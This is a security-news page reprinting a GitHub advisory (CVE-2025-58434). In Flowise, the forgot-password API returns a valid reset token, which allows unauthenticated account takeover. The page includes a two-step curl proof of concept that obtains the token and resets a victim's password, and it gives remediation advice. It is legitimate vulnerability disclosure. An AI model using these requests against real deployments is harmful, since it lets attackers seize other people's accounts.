Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-wgpv-6j63-x5ph: Flowise Cloud and Local Deployments have Unauthenticated Password Reset Token Disclosure that Leads to Account Takeover

Summary

The forgot-password endpoint in Flowise returns sensitive information including a valid password reset tempToken without authentication or verification. This enables any attacker to generate a reset token for arbitrary users and directly reset their password, leading to a complete account takeover (ATO).

This vulnerability applies to both the cloud service (cloud.flowiseai.com) and self-hosted/local Flowise deployments that expose the same API.

CVSS v3.1 Base Score: 9.8 (Critical) Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Details

  • The endpoint /api/v1/account/forgot-password accepts an email address as input.

  • Instead of only sending a reset email, the API responds directly with sensitive user details, including:

    • User ID, name, email, hashed credential, status, timestamps.
    • A valid tempToken and its expiry, which is intended for password reset.

  • This tempToken can then be reused immediately in the /api/v1/account/reset-password endpoint to reset the password of the targeted account without any email verification or user interaction.

  • Exploitation requires only the victim’s email address, which is often guessable or discoverable.

  • Because the vulnerable endpoints exist in both Flowise Cloud and local/self-hosted deployments, any exposed instance is vulnerable to account takeover.

This effectively allows any unauthenticated attacker to take over arbitrary accounts (including admin or privileged accounts) by requesting a reset for their email.

PoC

  1. Request a reset token for the victim
curl -i -X POST https://<target>/api/v1/account/forgot-password \
  -H "Content-Type: application/json" \
  -d '{"user":{"email":"<victim@example.com>"}}'

Response (201 Created):

{
  "user": {
    "id": "<redacted-uuid>",
    "name": "<redacted>",
    "email": "<victim@example.com>",
    "credential": "<redacted-hash>",
    "tempToken": "<redacted-tempToken>",
    "tokenExpiry": "2025-08-19T13:00:33.834Z",
    "status": "active"
  }
}
  1. Use the exposed tempToken to reset the password
curl -i -X POST https://<target>/api/v1/account/reset-password \
  -H "Content-Type: application/json" \
  -d '{
        "user":{
          "email":"<victim@example.com>",
          "tempToken":"<redacted-tempToken>",
          "password":"NewSecurePassword123!"
        }
      }'

Expected Result: 200 OK The victim’s account password is reset, allowing full login.

Impact

  • Type: Authentication bypass / Insecure direct object exposure.

  • Impact:

    • Any account (including administrator or high-value accounts) can be reset and taken over with only the email address.
    • Applies to both Flowise Cloud and locally hosted/self-managed deployments.
    • Leads to full account takeover, data exposure, impersonation, and possible control over organizational assets.
    • High likelihood of exploitation since no prior access or user interaction is required.

Recommended Remediation

  • Do not return reset tokens or sensitive account details in API responses. Tokens must only be delivered securely via the registered email channel.
  • Ensure forgot-password responds with a generic success message regardless of input, to avoid user enumeration.
  • Require strong validation of the tempToken (e.g., single-use, short expiry, tied to request origin, validated against email delivery).
  • Apply the same fixes to both cloud and self-hosted/local deployments.
  • Log and monitor password reset requests for suspicious activity.
  • Consider multi-factor verification for sensitive accounts.

Credit

⚠️ This is a Critical ATO vulnerability because it allows attackers to compromise any account with only knowledge of an email address, and it applies to all deployment models (cloud and local).

ghsa
Open in Source
#vulnerability#js#auth

Summary

The forgot-password endpoint in Flowise returns sensitive information including a valid password reset tempToken without authentication or verification. This enables any attacker to generate a reset token for arbitrary users and directly reset their password, leading to a complete account takeover (ATO).

This vulnerability applies to both the cloud service (cloud.flowiseai.com) and self-hosted/local Flowise deployments that expose the same API.

CVSS v3.1 Base Score: 9.8 (Critical)
Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Details

  • The endpoint /api/v1/account/forgot-password accepts an email address as input.

  • Instead of only sending a reset email, the API responds directly with sensitive user details, including:

    • User ID, name, email, hashed credential, status, timestamps.
    • A valid tempToken and its expiry, which is intended for password reset.

  • This tempToken can then be reused immediately in the /api/v1/account/reset-password endpoint to reset the password of the targeted account without any email verification or user interaction.

  • Exploitation requires only the victim’s email address, which is often guessable or discoverable.

  • Because the vulnerable endpoints exist in both Flowise Cloud and local/self-hosted deployments, any exposed instance is vulnerable to account takeover.

This effectively allows any unauthenticated attacker to take over arbitrary accounts (including admin or privileged accounts) by requesting a reset for their email.

PoC

  1. Request a reset token for the victim

curl -i -X POST https://<target>/api/v1/account/forgot-password \ -H “Content-Type: application/json” \ -d ‘{"user":{"email":"victim@example.com"}}’

Response (201 Created):

{ "user": { "id": "<redacted-uuid>", "name": "<redacted>", "email": "victim@example.com", "credential": "<redacted-hash>", "tempToken": "<redacted-tempToken>", "tokenExpiry": "2025-08-19T13:00:33.834Z", "status": “active” } }

  1. Use the exposed tempToken to reset the password

curl -i -X POST https://<target>/api/v1/account/reset-password \ -H “Content-Type: application/json” \ -d ‘{ "user":{ “email":”victim@example.com", "tempToken":"<redacted-tempToken>", “password":"NewSecurePassword123!” } }’

Expected Result: 200 OK
The victim’s account password is reset, allowing full login.

Impact

  • Type: Authentication bypass / Insecure direct object exposure.

  • Impact:

    • Any account (including administrator or high-value accounts) can be reset and taken over with only the email address.
    • Applies to both Flowise Cloud and locally hosted/self-managed deployments.
    • Leads to full account takeover, data exposure, impersonation, and possible control over organizational assets.
    • High likelihood of exploitation since no prior access or user interaction is required.

Recommended Remediation

  • Do not return reset tokens or sensitive account details in API responses. Tokens must only be delivered securely via the registered email channel.
  • Ensure forgot-password responds with a generic success message regardless of input, to avoid user enumeration.
  • Require strong validation of the tempToken (e.g., single-use, short expiry, tied to request origin, validated against email delivery).
  • Apply the same fixes to both cloud and self-hosted/local deployments.
  • Log and monitor password reset requests for suspicious activity.
  • Consider multi-factor verification for sensitive accounts.

Credit

⚠️ This is a Critical ATO vulnerability because it allows attackers to compromise any account with only knowledge of an email address, and it applies to all deployment models (cloud and local).

References

  • GHSA-wgpv-6j63-x5ph
  • https://nvd.nist.gov/vuln/detail/CVE-2025-58434
  • FlowiseAI/Flowise@9e178d6

ghsa: Latest News

GHSA-92vj-g62v-jqhh: Hono has Body Limit Middleware Bypass
ghsa